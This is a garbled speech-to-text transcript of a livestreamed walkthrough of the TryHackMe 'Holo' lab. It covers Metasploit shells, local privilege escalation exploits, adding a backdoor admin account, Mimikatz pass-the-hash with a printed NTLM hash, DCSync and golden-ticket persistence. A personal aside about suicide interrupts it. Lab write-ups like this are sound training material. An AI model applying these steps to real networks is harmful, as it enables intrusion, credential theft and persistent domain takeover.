Alright, so we are back on Holo, and we are going to be looking into, well, I was just talking to Sharma. Sharma, you also have to remember that mine wasn't in information security, mine was in IT project management, so mine was looking more on the project management side of what risk could be involved with those routers, everything like that. So, yeah, it's not a bug, it's a feature, exactly. So, we're back on Holo. NTLM Relay X, if you were watching the last stream, if you're watching on Facebook or on YouTube, this is not going to look, this is going to be weird to you. But NTLM Relay X is broken. We have confirmed that. Alright. When my buddies tried it, it does not work. So, at least right now it's not working. It could be working tomorrow. I did send a message up to try hack me to let them know, like, hey, this is not working. But we are going to, we're still going to root this guy. I mean, we're just going to do it with, we'll call it open source intelligence. That's what we'll call it. Okay, we'll call it open source intelligence. So we did look at this walkthrough the other day, right? And we saw, yeah, we're doing it correctly. It's just not working. It just, whatever's happening is not happening correctly. And we did try the NTLM. We did try 0.922. We did try that. Still nothing. So what we're going to do is we are going to go ahead and we are going to use a pass the hash technique. So I already have my S shuttle up and running. Okay. And we do have credentials as far as I remember. Let me see here. I forgot. We have Wadamet, password nothing to worry. But I thought we had more stuff. Oh yeah, once we got in there we ended up having to, because also cavity mover was also broken too. Which I did write to them about that also. So we are going to have to use one of these exploits to be able to become anti-authority system, to pretty much be able to become an administrator. So we're going to run, I just decided to run another exploit and show what exploit it was. That was smart of me. Good job, Ryan. So it looks like we're running exploits again. So let's get back into, go ahead and Remina like real quick, because we have to pretty much get back into 10.0.35 to be able to do a pass the hash, because we're going to make a session to 10.200.108.30. So let's go ahead and get back into 10.200.108.35 with Wadamet, right? Yes. And it's WATAMET, and it was nothing to worry, exclamation point. And there we go. Okay, so we're going to get back into him. Now remember, this user can't do anything. If you're watching on YouTube, you're probably like, yes, I know. I literally just saw it a couple days ago. But let's now make a, or I have to put it in C Windows task, right? So let's go ahead and scroll down to C drive. I don't know why the hell I'm doing it like that. Let's go ahead and open up PowerShell. And he's not an administrator, even though you can run PowerShell as administrator, which is super confusing, because I can right click, I can run as administrator, and we are not, as you can see up top, running as an administrator. That's super confusing to me. I don't understand why that's happening. Just go ahead and see Windows tasks, because remember there was some type of app blocker. I think the app blocker is right on here. I don't know, I get this one and read confused, but let's go ahead and hop in there. And we'll make a quick MSF Venom file. We're going to do a bind, right? Interpreter bind TCP. We'll set to L port 111. We need an R host in here, right? And that's going to be for 10 or yeah, 10.200.108.35. And we'll just call him a quick shell.exe. And let me make sure that we don't already have a shell.exe in here. We do not. Let's go ahead and do a wget HTTP. We should be able to talk back to a web server if I stick one up over here. Python 3 tacmhp.server. Let's go ahead and get my IP address like real quick. So let's go ahead and do a wget for this guy like right here. Can we not paste him in there? Did we already break him? Is he already broken? No, okay. What was it? 10.200 or 10.50.104.36? 10.50.104.236 or 36? 236. All right. /shell.exe. Out file will be shell.exe. We're gonna go ahead and we're gonna run this. The reason that we're running this is so we can become an administrator, right? So let's go ahead and get MSF console open. And then we're going to go ahead and use this exploit up here. I don't know why the hell I just wrote that in. Use this exploit multi-handler, set the payload to that. Set the R host to 10.200.105.35. Set the L port to 101. Let's go ahead and run that. Okay, let's go ahead and run it over here first, then we'll run that. Shell.exe. Let's try to run this again. Okay, and we get our interpreter session opened. Now we can go ahead and Control Z that, yes. And let's go ahead and search for suggester. Use 0. Okay, thanks. Use 0. Or search for suggester again. Use 0. How beautiful. Show options. Set session to 2. We'll go ahead and we'll run that. Now remember, this is going to take a minute to run. You're doing your master day. You use some technique to crack through. The other person has no clue what happened. You mean like they didn't understand how you did it? Is that what you're saying? Like they don't understand like what you actually did? Like they don't... Has it ever happened to you during your master's day? You use some technique to crack through and the other person has no clue what happened. My professor was an English professor, so nothing that I said did she actually understand what that meant for the master's dissertation. So I had to explain everything, and then she ended up giving the paper to an IT professor, and he kind of told her, yeah, okay, yeah, so yes, exactly that. Like I was just saying, my professor was a English professor, and that's who I was giving my, Cisco hacking dissertation to. And yeah, so she didn't understand anything. So I broke it down as much as what I could, try to break everything down. I pretty much want to make the paper to where anyone could pick it up, read it, and understand stuff about it. But yeah, she ended up giving it to one of the IT staff there. They also read it, and I guess they tried a few things, and they said that, like, yes, this stuff does work. Like, it is possible what he did. And that kind of helped out a lot, obviously, on my paper. But yes, not everyone that is going to read your dissertation, not everyone that is going to be, if you're doing an actual physical one where, you're actually in a boardroom, stuff like that, not everyone there is going to understand what the hell you're talking about. There's more going to be one or two people that understand what you're actually talking about. But yeah, 100%. So you just got to try to break it down to where, because let's say you were doing an actual pen test for a company. The CEO is not going to understand what the hell you're saying when you say, yeah, we ran Mimikatz and then did pass the hash. Some of the networking guys aren't going to understand that, It was a bouncer for them. But like some of the networking guys aren't going to understand like what I said. So you have to kind of break it down in layman's terms of what you actually did. What do you mean by bouncer for them? Like they didn't understand? Like the IT professor didn't understand it? If he didn't understand it, shit. Tell me the school, I'll go work there. That's kind of crazy if he didn't understand it. Or at least, understand the theory behind it. You know what I'm saying? That's really all they need to understand is the theory behind it and how it works. Now, exploit 12 always does take forever, so we're going to let it run. We're just going to let it do its thing because this one always takes a minute to run for some reason. I forgot what exploit we actually used. But did I actually save it over here? I could just start typing these in, huh? I feel like we used one of these two. Let's try exploit Windows local CVE 2021 40449. Okay, so that one was for 17136. That one didn't work. Let's just start breaking this guy down. We got the network service with that. And then we did another one, got to there. So let's try that 40. I feel like it was this 40449 one. So let's try that. That's kind of scary. If he's the IT professor, that's kind of scary then. That means he really... But you know what? I mean, in all honesty, Security Plus, stuff like that, a lot of the professors I met for Security Plus, a lot of the teachers, shouldn't really say professors, but a lot of teachers I met for Security Plus, they just know, like, oh yeah, buffer overflow is like, there's like bytes in memory. Like, really? Like that's what we're going with. Okay. So let's go ahead and search for 40449. U0. Let's go ahead and set the payload to Windows x64 interpreter bind TCP. Show options. Set the R host. I mean, you just got to break it down for them then. If that's the case. 10.200 108 dots. And some of that stuff I do understand is hard to break down. Let's go ahead and set the L port. We can leave it at 444. Set the session stack I. Set the session to 2. Alright, let's go ahead and run that. Can I set like where it's going to run at? No, not this one, I can't. Okay, appears to be vulnerable. So it died. Okay. But at least it tried. So what I want to do is I kind of want to just get back into it and maybe CD. Okay, that's okay. Let's go ahead and go to sessions 2. Okay, we're already in task. Never mind. So it died. Let's try to run it one more time just to make sure. Let's see here. What else do we have? 17136. We know that one doesn't work. We also have 4044 now. We're doing that like right now. Okay, so that's not working for us. Let's go ahead and search, search for IKEE, U0, show options, set payload to Windows interpreter bind TCP, set R host to 10.200.108.35, set the session to 2. Let's go ahead and run that. See if that works. Wrong payload architecture. Great, okay. Show targets. Use 1. Set target to 1. Show options. We run it now. Wrong payload architecture. I don't think we can get a reverse TCP back to me, can we? I don't think we can. We can try though. Let's just try to do just the netcat. Yeah, let's go ahead and set payload to Windows x64 shell reverse TCP. Run that. Set L host to myself. Let's go ahead and run that. I don't remember which one we did over here. Okay, so it's not able to write to anything. Spoolful, I don't think we could do that one like right there. I guess we could try the 13371. Use 7. I think it was easier than I just gotta look at the original item. Just work on simulation software against 2 layers 3 and it's done. I had no idea how to use Wireshark to pack analysis. Man, they're using AWK. Show targets. Guess we could just try to just set the payload to Windows shell reverse TCP. Set session 2. We run that. Must match target architecture. Can we do an x64 with this guy? Okay, we can. Okay. I feel like we did 40449. I feel like that's what we did last time. I'm just kind of looking through my screen, seeing what we have here. One 7.3.1.6, we at least got in with that with NT Authority Network Service. And that's him, right? So I feel like we did 40449. Let's go ahead and do a set payload to Windows x64 shell reverse TCP. Set the L host to ×0. I'm going to run that. See if we get anything back over here. Maybe we just can't do a bind. No session was created. Do we get MP preference? I don't know why we're not able to get anywhere on here. Which now that I think about it, yeah, because I do need to do Mimikatz. Because we can't do a Mimikatz on here now, can we? Because we're not an actual administrator, huh? Is Ryan still on this box? Like, so I've already gotten into it before. No, of course not. Why would he be? Alright. So, I don't know how the hell I got into this guy before. But that's kind of crazy that we can't get into them again. Let's go ahead and go back to suggester. Search for suggester. Use 0. Run. Let's let this guy just run and do its thing. Because who knows, there might be another one after that, but I highly doubt there is. Alright, while this suggester is running, I'm going to step outside. And, so yeah, I'll be right back. Because this guy does take a minute to run. So I will be right back. We'll just let this guy do its thing. Oh man, we got past 12. That's a big deal. I mean, I'm not going to go anywhere. Because he's moving now. We're not going to go anywhere, actually. This guy's now moving. I'm gonna run this 17136 again, see if we can get back through that because we were like NT something weird. Some service, some of that. So we're gonna try network service, that's what we were. I'm gonna try to run him again, see if I can get back into him. And then go, okay, so that's all of them, like right there. So let's try to run this guy again. See if we can do it like that too. To have it come back to me. We do have shuttle up and running, so we may be able to. We may not have to do a bind. Maybe I'll do a reverse TCP. And it looks like that is working so far. Or if I should have told it to drop it in a task also. We can't tell it to drop it anywhere. Never mind then. What payload was this? Okay, it's a stage payload. Sending stage, okay. So like a wait, or is time seconds to wait. Probably should have said 0. Or it's not able to talk back to me when them two are happy like right now. This guy seems a little stuck. So let's try it with a bind, I guess, because he seems a little bit stuck. So let's go ahead and set payload to Windows x64 bind. Can we do that like right there? Huh. How in the hell did we do this before? App blocker is definitely running. We can do stuff within tasks, I know that much. We got this one to work actually before with a what type of payload? With an interpreter bind payload actually. We got this exact one to run. On 10200 108.35, that's funny. And it did run. Then we ran a second exploit, which was another bind, and we got in. But I didn't take a print screen of what the second exploit actually was. So that was super helpful. But I don't remember it taking very long to actually hop into it. I feel like the second exploit was this guy right here. Try like that. Did I do a stage or stageless? How about that? I did a stage exploit also. I'm going to try stageless. We'll see what happens. It's getting there and then it's immediately dying. I feel like that's because of where it's trying to drop that guy into it. And I feel like we did the other one first, and then we used that one to run our other one. Like we got into here, we got into NT Authority Network Service or whatever. And then we, from there, we then ran 40, whatever it was, the 401, 40449, we ran that on this guy right here, probably, I was thinking, maybe, on NT, but we're not even getting into this guy anymore. There we go. We finally got into them. Okay, cool. So what in the hell? Well, I've had that happen before though also, but session 5, get UID, and we're network service. So going back out of here, let's go back to 40449, then we'll set the session to 5. Let's try to run that and see if that does anything for us. Interpreter session 9 closed. Because network service, we can't do anything with it. We can't even get system with it. So if we go to sessions 5, Frank, how you doing? And we go to get system, we can't do anything in here with network service. Well, kind of, but the exploit that I used to get in last time finally just worked, and the other one is not working at all. So I remember we did a bind on there. Okay, we're NT. Let's try to do. Can we do a shell on this guy with him? Power shell? Or is he going to break? I think this is already disabled though. See, we can't do anything. Permission denied. We're back to this guy again. Anti-authority network service, which we know is useless. But for some reason we can't use what I'm pretty sure was the exploit that we used last time. Let's just go ahead and try to do a set payload to Windows. Where are you? Okay, thanks. Thank you very much. Let's go ahead and try to do a set payload to Windows x64 bind or shell bind TCP. Try to run that set L port to 111, I guess. Try to run that. And it immediately closes it. Okay. So I go up to exploit suggesters. We tried him. It's not him. It's not him. Guess we'll just try Sprinter Demon like right here, although I'm pretty sure it's not going to be him. Pretty sure we need like a printer name for this. Show targets. Show options. Set payload to Windows. Hi, beautiful. Windows. What's up? You going to bed?
This will be the last time I come out.
Oh, you smell like something.
Like brushing teeth?
Yeah.
You know,
what I do?
still love you if you're in a wheelchair. Okay? Like if you were paralyzed from the neck down.
That's still on. Just because you're saying that and that's on, that doesn't.
Just watch this movie. It was so sad. Just, oh my god.
I probably want you to go find someone else.
I think that's like the whole point of him killing himself.
Yeah, I'd probably just do that, honestly, if I was paralyzed from the neck down.
Yeah, no. It was sad. It was very sad.
But
You before me, or me before you, or something like that. I don't know. But this guy, he was hit by a motorcycle walking, and then paralyzed from the neck down. And his parents got him this suicide watch. I guess he were trying to like, I don't know how though, because all he can move is like a finger and a thumb. So, you know, like.
Well, that's enough. Yeah, that's enough.
I don't know. I don't know how you get down there to do it. Like he couldn't move anyways.
I'd figure it out.
So he told his parents that he would give them 6 months.
Okay.
And he wants to be done. So they looked up this doctor that would done him. Oh my god, but then this girl ended up falling in love with him. He fell in love with her. He's like, yeah, I'm still gonna do it though. No. He's like, what? He can't do anything for her. And he's like, yep.
I'd probably just, you know, work myself and then just go down a hill toward a cliff. That's probably what I do. I go out with a bang. I definitely get some speed going.
He was, I guess, euthanized or whatever, but he went to like Switzerland to do it. She's like, "Will you be there?" And she's like, "No, I can't do that." But then she ends up going. I was like, "Man, I don't know if I could."
No, I definitely roll down a hill and like. But yeah, I actually just finished up Wreath, right, Frank. But yeah.
That hurt my heart.
I'm sorry to hear that. Alright.
I'm going to bed on that note.
Okay, well, have a good night's sleep. Show options. Set the... What'd you say? Yes, I know. I just went off. X64. We'll just do a shell bind TCP. I love you too. Show options. Set our rhost to 10.200.108.35. Yeah, I just finished up Wreath. We just did the last part of it. Set the outport wall. I kind of broke it. Hopefully you're not on the same network that I'm on. Well, don't, no. She, actually just mess with her a lot. That's all I do. But set session to, I guess, any one of these numbers. 5, I guess. We'll try to run that. Git is we'd run it into it, right? So let's try to CD over to there. Let's see what we got. Oh my god. Oh, there we go. Okay, cool. Access denied. Okay, can we just like run that though? Can we just like run that guy though? Let's go ahead and put that in a different location actually. So let's say set writable directory to Windows C//Windows//task. Let's try to run that again. And let's try to put it over here. There he is. Let's try to run that, I guess. Zero bytes to it. I don't know how I'm supposed to exploit uploaded there. What am I supposed to do with that? Yeah, the Git stuff, that took me a minute to figure out, but finally got it. So I finally got that Git stuff, but yeah, it did take me a minute. You do have to make the file, if I actually, let me go back into my stuff, CD into Wreath. What? Oh. You do have to, so I made a website.git, right? That's like where I dropped it down to. If I go to website.git, then you have to make this .git folder, okay? And I put the extractor.sh like right here. Once you make that .git folder, so I changed the C drive folder into .git. So if I just moved it to there. So if I cd into .git folder, That's everything that's inside of it, right? And then I put the extractor right here and told it to extract a website. So if I can go, can I do that? Extractor.sh. Then I did like period website to say, hey, drop that .git. Let's see the website I want to see if it works. Yep. So I did like that, right? So I said, hey, just run like this, drop it here into this folder. So if I do an ls-LA again, we get that website 1. And then that's how I ended up figuring that one out, like right there. So let's look at another exploit, I guess. We're just going to play the exploit game again. It's not that one. It's not that guy. I still think it's that guy. Spool fool. It's not going to be this guy right here. But we're going to try him. Select the path. We can say to Windows task. Set the rhost 10.200.108.35, and we'll go ahead and we'll run that. Set session. It doesn't really matter. 5, I guess. Yep. Okay. Operation failed. Access is denied. What? Why is it denied? It's in tasks. Where we're allowed to mess with stuff. Okay, let's try to put it in temp. Okay, yeah, well, there's no default printer, no shit, huh? Okay. So for some reason, access was denied with that one, like right there. And we were Wadamat at this time, right? Yeah, because I definitely say be worse than Wadamat. I definitely said that, huh? So we were Wadamat at that time. We had the same exploits. It's that 40449. I know it is. We're going to try to run him again. I don't know, maybe he was updated, so now he doesn't work anymore. Maybe I need to update the target? The exploit target, maybe? Because it just keeps closing it out. So, show targets. Alright, that's about it. Set target to... Yep, that's all I got. Okay. So, keeps closing them out. Try to make a reverse one maybe. Maybe I just can't do a bind. Let's try to make a reverse one. We'll do Linux rules, and then we'll do a netcat and we'll wait for them. Something like that maybe. And then we'll do a set payload to Windows x64 shell reverse TCP. Set lhost to 10.200.108.33. Set lport to 444. We'll run that. See if it calls back over here. Oh, I said that. Yeah, that's the lhost. Never mind. And we got nothing back over here, huh? Can I create a user with that guy? Ooh, can I create a user? Sessions 5. No, I'll probably just get access denied. Let's go ahead and do a shell net user Ryan. Probably get access denied, huh? Yep. That guy's pretty much useless, like right there. So I know that this is it. That's just pissing me off. And we did it as an interpreter shell last time too, didn't we? So I know that is it, like right there. Yep, we just have 100% the x64 interpreter bind TCP. Man, that's making me mad. It's pissing me off again. It's gonna open and close immediately. Immediately dies. So it's gotta be something with antivirus, something's making it shut down. Not even on. So why is it? That's why, like right there. Real-time protection is off. So why can't it do that bind shell then? If real-time protection's even off, then what the hell is going on here? We still have shuttle up and running, right? Shuttle is still up and running. What? So this time we got with a reverse TCP back to myself. Okay, I'm gonna go ahead and take a print screen of that. That is something else, like right there. Make sure I get that 40449 there also. So let's go ahead and show that we got another time when I did the box, we had to do the following. Okay, so now we should be NT System Authority in there. So let's go ahead and do a get UID. And we are NT System Authority. Okay, cool. Let's go ahead and do a shell. And what we want to do now is we just want to add a user in here that's an administrator, an actual administrator. So that user Ryan, PS-SW0D1, add net local group administrators, add net, administrators, net local group administrators, add Ryan, net local group remote desktop users, add Ryan, net local group remote management users, add Ryan. Alright, so why that worked that time, I do not know. But we got him. At least we're in, right? Any one of those little hotkey things, it's like we're in, you know. So we got there. So let's go ahead and see. I don't remember if WMI exec is on here or not. Let's try it. EvoWinRM to 108.35, right? Let's try that like real quick. And it is on there. Okay, so if I do a who am I / priv, or who am I? I'm Ryan, obviously. Who am I / priv. Alright, and I have a lot of privileges. They're all enabled on here. So I have everything, right? So let's do a pass the hash. Okay, that's what we're going to do now. So we need to get the hash first, which we cannot get it from that machine that we're on like right now. and we can't get in the other machine because we can't do the NTLM relay x dot pi. But what we can do is we can go to a PowerShell session, right click, more, run as a different user, and we can do Ryan. Actually, I don't know if that's going to work. That definitely said Holo live. Yep, because I'm actually not on the network. So we want to go ahead and log out. We're going to log back in as Ryan. Let's go and log back in. Ryan, PS on SSW0RD1. What we're going to end up doing is we're going to end up passing the hash of the server admin user over to the domain controller and make it think that we are him. That's what our final goal is here. So let's go ahead and get Mimikatz on here. Right click on Windows PowerShell, more, run as administrator. Okay, now as you can see, we are now an administrator. It says administrator up there. Usually you go into C Windows System 32. I don't know why we're not on this guy. Let me get this a little bit bigger for you guys because it's going to probably be a little bit hard to see there. Let me go to properties, font, roll at 18. Tab. Can I click on that? Okay, no, I cannot. I think I'm okay. Okay, there we go. So we're going to do a IEX IWR HTTP. We're going to go back to myself, right? So let's go ahead and grab my IP address. Boom, there we go. So that Python server up and running. We should have invoke Mimikatz already on that guy also. Invoke Mimikatz.ps1. And this is like where we're going to cheat, like I said, how we're going to cheat and everything. This is like where it's going to be at. Response, oh, use basic parsing. There we go. If you get anything about Internet Explorer, it's because you did use basic parsing. Right, cool, so there's that, right? So like I said, the box is broken, so we are doing it a little bit differently, and we are cheating, right? So first load Mimikatz onto .35. Okay. Then we are going to do a pass the hash. Since nothing was working and it was verified to not be working at this time, we looked at a walkthrough and found NTLM hashes. Alright. Which that's not really the best way to do it, but that's how we're going to do it. So we're going to do an invoke Mimikatz. Should not hit tab. I done it messed up. Invoke Mimikatz tag command. SEKURLSA scroll pass the hash for user is going to be SRV admin, SRV tac admin slash NTLM. It's just going to be the NT, so it's only the right hand side after the colon there. So it's going to be 43FF or 4A3 FF512 0BBAD F8F262E230 FAEB 58B14. Alright, that's the NTLM. Run, we're going to run PowerShell.exe, and domain is on holo.live. Now another PowerShell should open up, and we're still going to be Ryan in that PowerShell because we're not talking to domain controller. We're not passing a hash in this PowerShell. So if I do a who am I, I'm Ryan. But now if we create a session equals new PS session to DC tac SRV01, or is that what it was? I forget what the domain controller's name is. Instead of getting that domain controller and all our stuff, we're just going to look at it. DC SRV01. Yep, that's what it was. Okay, cool. So we're going to do a net or a ses equals net new PS session to DC TAC SRV01, and we got to put in computer name, TAC computer name, DC SRV01. Now we're still Ryan, but if I go to ses, I can see we now have a session with this guy, right? But supposedly I'm a local admin that's not a network, but how the hell I get a session with him? Because we are passing the hash. I am actually a SRV admin according to him. So if I do ses equals, or enter PS session, excuse me, enter PS session for session $ses, I'm now a DC server 1. Who am I? And I'm SRV admin. That's because we did a pass the hash. Okay, then from here we can do whatever we want. Right, so now we're going to grab that, the final flag. So we'll go ahead and CD and that back. I don't even know if CD and desktop maybe. I don't know what flag's even at. Let's go ahead. We probably forgot where the flag's at. What flag is probably the root DC server 1. Where's the flag at? CD to C drive. CD to users. CD maybe into administrator. Desktop. Type root.txt. And there we go. There's our final flag right there. And I copied a 4 for some reason. That was it. And there we are. So we've now rooted him. I kind of want to get a 10-200 10832. I don't know if we're allowed to get a session on him or whatever else. Let's try it. Let's go ahead and exit out of here. Ses equals new PS session. Computer name 10.200.108.32. You can also put an IP address for a computer name. And he does not have WinRM up. So another way we could have got in there was we could have utilized so let's go ahead and copy this hash. We could have also utilized WinRM, right, with a hash, right? So we could have done a evil WinRM on 108.30, TAC U, SRV, TAC admin, TAC capital H, and then the hash. And we could also get in that way too. That's just another way to get in. Okay, cool. So we did that, right? Now, since we cheated it, right, let's go ahead and do some other stuff here. So what we should be able to do is, I don't know, we can make a golden ticket so that we'll always be able to go back and get into that guy, right? We could do something like that. So let's go ahead and use basic parsing. .1050.104.66.236, excuse me, / invoke minicats.ps1. We can also do script blocks, things like that in here too. So we can also go with this other guy. I'll show you what script block is, because I don't know if I showed you guys this one in other videos. So let's go ahead and exit out here. I don't know where the heck I'm even out of here. Okay, so we're back in the regular file, right? We're back in, where am I? I'm back on Ryan, right? We could do a, something called a script block, right? And script blocks are pretty cool because what you can do with it is you can actually, like, you can start to talk to the other machine without directly going onto it. So instead of an enter PS session, we could just do a script block. And that's with a invoke command. Okay. What's going on here? What the heck is going on here? What the heck is going on here? Okay. So it's going to be invoke command. All right. Where do we want to invoke it to, right? What computer name do we want to invoke it to? Okay. Tag computer name. DC tag SRV01, right? That's who we're going after, right? That's who we want to talk to with it, right? And then we do tag script block. And then what do we want to actually execute on it, right? So we do a tag script block, squiggly lines, who am I, squiggly lines. And I think that should be it, if I remember correctly. Do I not have a session with him anymore? Or did I just break him now? I probably just broke him because I did something out of the norm. Yeah, I don't think I have a... maybe I also spell who am I correctly also. Who am I? I still have a session with him? Okay, so as you can see, I am server admin. And we did that using script block. So we can actually do that with invoke mimikatz. We can do that with a lot of things. We can also do what's called file path. File path is pretty cool because what that does is it allows us to be able to pull something from ourselves and run it on someone else without it actually being physically on the machine. So we could run something like file path, and then we could run invoke mimikatz as long as it's on our machine. We could run invoke mimikatz. Now, when I say on our machine, I don't believe it can be in memory. I think it has to actually be on the machine itself. We can try it though, because we know mimikatz is in memory like right now, right? So we can do a tag file path. But I'm pretty sure, yeah, it has to actually be on the machine itself. And then we would say what the file path is. So, yeah, we'd have to actually do what the actual file path is. So we'd have to like C Windows task something in here, right? So we could try to run like shell.exe on here, right? And it would try to run that on that other machine. So, well, obviously it has to be a PowerShell script. So let's go ahead and actually do a wget for, let's say, PowerUp, HTTP 10.50.104.236. Because I don't think I've showed you guys these ones like right here. With the script block I already showed you, but I don't think I've shown you file path yet. And we'll do powerup.ps1. Tag out file will be C Windows task powerup.ps1. Let's go ahead and do that like real quick. Wget that guy. Let's try to now do a file path again. We'll see C Windows task powerup.ps1. Alright, now if we actually put something at the end of powerup.ps1, so let's go ahead and do that. Let's go ahead and actually add something at the end of it, because that will run it. At least it's supposed to. So let's go ahead and go into the C drive, right? Top over there, C Windows tasks, and we'll right click on this power up and we'll say want to open with Notepad like right now. Yeah, let's open it up in Notepad. We'll say okay, and then let's just go ahead and we're just going to go down to the very bottom and we're just going to say, hey, go ahead and invoke all checks. Invoke all checks. I might actually, yeah, we'll do an invoke all checks. We'll save that, right? Control S or just save. However you want to do it. If you're a peasant. No, I was kidding. Alright, we'll go back to this guy. We'll try to run it again. And we should actually see that invoke all checks come back to us. So it should run on there and then send it back to us. And we can actually see what's actually happening here. And this is built in to PowerShell. So this is a feature of PowerShell, like right here. Obviously, every feature you can abuse, like we are right now. But yeah, this is one of the features that are actually built into PowerShell to make your guys' life supposedly easier, right? To make our life supposedly easier. And now we're just going to abuse it. Because that's the type of people that we are. Because no one can have nice things nowadays. So as you can see, we get all these mod files, okay? We are the admin on here, and we're also running a Remina, so it's usually obviously a lot prettier than that whenever it comes back, you know. But we can try to stop that. do a control C. Okay, cool. So we see if we can actually run something on there. So we could run invoke mimikatz. And we could run, if we actually brought invoke mimikatz back to our machine, we could actually run that on there like that. So we could actually put the whole golden ticket thing at the bottom and then run it on there. We're not going to do that because it's going to take a minute, but let's just go ahead and do an enter. Well, we already did invoke mimikatz over here. And let's go ahead and now let's try to get that guy so we can actually do a golden ticket, right? So very first thing we're going to need to do is an LSA dump tactic LSA patch. So we're going to do a invoke mimikatz tac command LSA dump LSA / patch. We're looking for the KRB TGT hash there. That's what we're going to end up looking for. His NTLM. And we also need the SID too. Okay, KRB TGT. That's who we want to find. So KRB TGT. There we go. So now we're going to do an invoke. So let's actually start up a little file here. Nano golden.txt. KRB TGT. There we go. Okay, we also need the SID, right, which is right here. SID. Okay, good to go. And we should be in group 500, right? That's what group we want to be in, is 500. Now, if you really want to get into this, I said this also, I believe it was in the PMPT video, or it was within the Hacking with PowerShell videos. I don't remember which one. But if you really want to get into this, there's actually ways to actually be able to look at how long tickets can be created, right, and things like that. And looking at how long tickets can be created and stuff you can hide your ticket better inside of a file system. But let's go ahead and do an invoke mimikatz. Tac command. Alright, then we're going to do Kerberos golden. Now, something else to remember, that even when you're making a silver ticket, you're still going to type in Kerberos golden. Alright, then we're going to put in the user. Now, the user can be anybody. We can do administrator. Okay. We're going to do /domain. Oh boy. That kind of sucked now, didn't it? No, I'm just going to do it on here, actually. I already have mimikatz running on one of these guys, right? So we're going to do an invoke mimikatz. Not on that one. Wait, do I not have it on that one? Let's go ahead and get back to my session. Enter PS session, $, tax session, $ses. What? Where am I? Looks like I lost it. I don't know what. Looks like I lost it. Mimikatz. I lost that session, I know that much. I don't know what. Where'd you go, session? Probably a little bit faster when I just typed it in, huh? Enter PS session, $ses. Let's go ahead and invoke mimikatz again. Invoke command. Let's go ahead and get the IEX-IWR. Remember, it is running in memory, right? There we go. Okay, so we got that back into memory. We do already have the hash and the SID, which are two things that we need. So let's go ahead and type in invoke mimikatz. Tac command. Kerberos golden, right? User, administrator, we can pick any one we want. /domain is going to be holo.live. /ntlm is going to be right here. Okay. Slash SID is going to be right here. Not to think. I think that that's it. SID user. Oh, we also need the KRB TGT and also the ID. Okay, so we need the KRB TGT slash KRB TGT. We don't need NTLM. That's why. Because that's going to be KRB TGT. Because we need the ticket, right? So let's go ahead and let's get rid of NTLM here. There we go. KRB TGT. And we need this guy right here. We need that hash. And then we need slash ID of 500. What group do we want to be in? We want to be the 500 group. Pass the ticket. I think that's it. We'll know here in a second whenever we do a, I believe it's K-list. And we'll see if we have a ticket. Or if another ticket was created. Alright, file ticket saved to file. Cool. So we have a ticket now, right? Suppose it's been saved to a file. And now, if I remember correctly, we should just do a K-list and we're good. Yeah, if we do K-list. So if we just do K-list. So we can actually do a K-list purge and see if we get a ticket in there. So let's do K-list again, and there should be anything in there, right? We'll run that command again, and let's see if a ticket's in there. If the ticket's in there, we now have persistence on the domain controller. K-list.exe. Oh, he's not saving that ticket. So let's say file ticket saved to file. So it's not doing a, is it not passing it off? You want to know why? Probably because I'm already in the domain controller, I think. Let's go ahead and actually copy all that stuff. We're going to exit out of here. And we're actually just going to copy this whole thing. Oh. Let's go ahead and exit. Not because I'm already in the domain controller. That might be why. Am I still in the domain controller? No. Okay. Let's do a K-list purge. So there's nothing in there. Then we'll go ahead and we'll throw that command in there again. That should be everything. Curb rose golden, pass the ticket. That should be all of it, like right there. Huh. I'm also wondering if we just can't do it on this machine or on this box, like right here. Because that should have been everything on there. I want to make sure that we have the right hash. How about that? For the KRB TGT. So invoke mimikatz attack command. Should be LSA dump. LSA, right? And that's going to be freaking the user. Service admin? Like the user? No. User KRB Holo live. KRB TGT. I think we do it like that also. Just dump. Oh, maybe not. Okay. That's weird. Probably because I did LSA dub LSA deny. It's supposed to be DC sync. domain controller. Holo.live with the user account. I wonder if I can just do Holo. ARB-TGT, that's really weird. Then you get rid of the whole domain there. I'll say down DC sync user KRB-TGT. Ooh, what we got here? Okay, so for some reason it didn't want the full thing there. But there's his hash again, like right there. Is it the same hash that we have over there? Looks like it, doesn't it? Yep, that's the same hash, okay. So we do have the same hash in both spots. So what the heck is going on with a pass the ticket here? Why are we not able to pass the ticket like right now? Let's go ahead and look at the command again. That did before. Oh, we are way off. Do we have to do a slash groups? 512? Here's a slash groups thing. There we go. Slash groups. So as you can see, we now have a Kerberos Tigray ticket on here. So what our file command was is invoke mimikatz attack command Kerberos golden. User's gonna be administrator. We pick a user. Okay. Domain holo.live. The SID, which we got from whenever we dropped everything, right? And we can also get it from that DC sync that we did, like right here, right? Where's it at? I thought we could. Yep, there it is. SID. Okay. It's only going up to that 20 also, just so you know. So it's only here to right here is the SID. All right. From there, we then did a, so we now have persistence also. So from there, we then see how it only goes to 20. KRB-TGT. Okay, we put in the KRB-TGT's hash that we obtained. ID 500, groups 512, which will still put us in that administrator group, and pass the ticket. So we did for user administrator, and now we have a ticket now that is saved on this machine, right? We have persistence now. Okay. You can actually download that ticket file also. So you can actually get that ticket file right here, and you can do more with it. Like bring back yourself, re-upload and stuff like that. But now we should be able to do an ls// svr attack admin. Now, do we still have a session on here? That's my question is now. We do. Okay, let's go ahead and how do we exit out of that session? How the hell did I close it out last time? We do an exit PS session. Session. Exit PS session 7 maybe? Kerberos debug, error action, warning action, information action, error variable. I don't know. Or can we just go into enter PS session, then say exit from there? How do we? Well, I mean, we're not in it, so we can do an ls// and then we can look at like SRV admin, and we could try to look at like their C drive or something like that. right? So we could try to do something like this where we're not actually going into the file server itself, right? Which is, I mean, I don't know, I think it's pretty cool. But we could do an ls, and then we'll do a slash slash, and slash the other way also. And it should be the was it DC Tech DC SRV01 dot holo dot live $. So there we go. But we can do that because of the ticket that we have like right now. So if you want to see that again, let's go ahead and we will make sure that we don't have a session on one of them, and we'll throw that guy back in there. So let's go ahead and open up this administrator tab, I guess, or this administrator tab over here, and we'll do a $ses. So we don't have a session over here, right? We also never passed the hash over here, so let's go ahead and pass the hash again, and we'll run PowerShell again. So now we won't have a session anymore, right? And we'll invoke Mimikatz on the other guy. We'll actually look at K-list real quick. Let's see what we got for K-list. If it's in there, nope. Okay. So let's go ahead and we will invoke Mimikatz again, just so you guys can see that it's not just this session that's doing it. That we already have. And that's actually that, was that ticket that we have now, right? That golden ticket that we created. There we go. Okay. Now we'll do our invoke Mimikatz, right? For not that. There we go, pass the ticket. We'll do a K-list. We'll see that the ticket's in there. And then we'll go from there. So we'll do a K-list.exe. And it does not have a ticket for some reason. Why don't... Sometimes this guy doesn't like to 